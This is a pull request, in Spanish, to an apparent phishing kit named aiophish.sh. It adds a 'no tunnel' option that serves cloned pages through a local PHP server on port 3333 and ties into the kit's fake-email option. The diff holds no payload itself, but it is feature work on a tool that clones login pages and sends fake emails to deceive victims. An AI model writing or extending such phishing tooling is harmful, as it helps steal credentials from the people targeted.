### PR TITLE
Opción "Sin tunel" añadida

### DIFF
--- a/aiophish.sh
+++ b/aiophish.sh
@@ -249,7 +249,8 @@ tunnel(){
         echo -e "$v[$b*$v]$b Selecciona el tunnel:\n"
         echo -e "$a[$b 1$v ] Localhost.run"
         echo -e "$a[$b 2$v ] Serveo"
-        echo -e "$a[$b 3$v ] Ngrok\n"
+        echo -e "$a[$b 3$v ] Ngrok"
+        echo -e "$a[$b 4$r ] Sin tunel\n"
         read -p $'\e[1;33m[\e[1;39m*\e[1;33m]\e[1;39m Elige una opción\e[0m > ' tunnel
         if [[ $tunnel == "1" || $tunnel == "01" ]];then
                 cd $ruta_carpeta
@@ -274,6 +275,17 @@ tunnel(){
                 clear_meta
                 menu_options
                 add_option
+
+
+        elif [[ $tunnel == "4" || $tunnel == "04" ]]; then
+                cd $ruta_carpeta
+                tunnel2="localhost"
+                trap finish EXIT
+                clear_meta
+                menu_options
+                add_option
+
+
         else
                 echo -e "\n$r[*]$b Opción invalida: $tunnel\n"
                 sleep 0.5

--- a/servers/tunnel.sh
+++ b/servers/tunnel.sh
@@ -116,4 +116,29 @@ ngrok(){
         check
         check_found
 	fi
-} 
+}
+
+
+localhost(){
+
+if [[ $clonada == "si" ]];then
+		descargar_pagina
+	fi
+        echo -e "$v[$b*$v]$b Iniciando servidor php..."
+        php -S localhost:3333 > /dev/null 2>&1 &
+        cd $OLDPWD
+
+        echo -e "$v[$b*$v]$b Tu enlace: \e[0;32mhttp://localhost:3333"
+        cd $ruta_carpeta
+
+
+        #Si la opción 7(enviar correo falso) esta elegida, mostramos un mensaje
+        if [[ $add7 == "7" ]];then
+                echo -e "$v[$b*$v]$b Enviando email..."
+        fi
+        check
+        check_found
+
+}
+
+


### PR DESCRIPTION
De esta manera, los usuarios no están obligados a seleccionar un tunel. Esto puede ser útil si se quiere hacer un tunel con otro servicio.